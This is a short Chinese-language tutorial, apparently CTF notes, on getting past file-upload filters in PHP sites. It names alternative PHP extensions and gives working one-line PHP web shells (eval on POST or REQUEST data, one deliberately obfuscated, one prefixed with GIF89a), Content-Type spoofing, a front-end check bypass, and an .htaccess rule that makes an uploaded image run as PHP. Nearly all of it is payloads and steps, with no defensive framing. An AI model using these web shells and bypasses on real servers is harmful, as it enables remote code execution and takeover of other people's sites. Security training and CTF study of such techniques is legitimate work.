一.知识

绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht

二.实例

1.phtml, <?简单过滤

(1)一句话木马
故意使用了post和get用来迷惑人
https://127.0.0.1/shy.php?POST=assert 密码：GET

<?php $_GET['POST']($_POST['GET'])?>

(2)提示说不是图片，需要抓包改文件格式。将Content-Type里面的格式改为

image/jpeg

(3)带<?的一句话都不行

GIF89a? <script language="php">eval($_REQUEST[8])</script>

(4)现在需要知道图片的保存路径了。
一般都是

upload/filename

2.前端验证, phtml

(1)一句话木马

<?php @eval($_POST[8]);?>

(2)前

jpg

(3)后缀

phtml

3 .htaccess

(1)一句话木马

GIF89a? 
<script language="php">eval($_POST[8]);</script>

(2).htaccess文件，里面的内容为：

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

注意里面的1.png要和你刚才上传的文件名一模一样！

注意jpg还是png，要改为相应的。

(3)访问

得到

/var/www/html/upload/ba50cbfb34f9f155b88ae419dabfade8/b.jpg succesfully uploaded!

访问

/upload/ba50cbfb34f9f155b88ae419dabfade8/b.jpg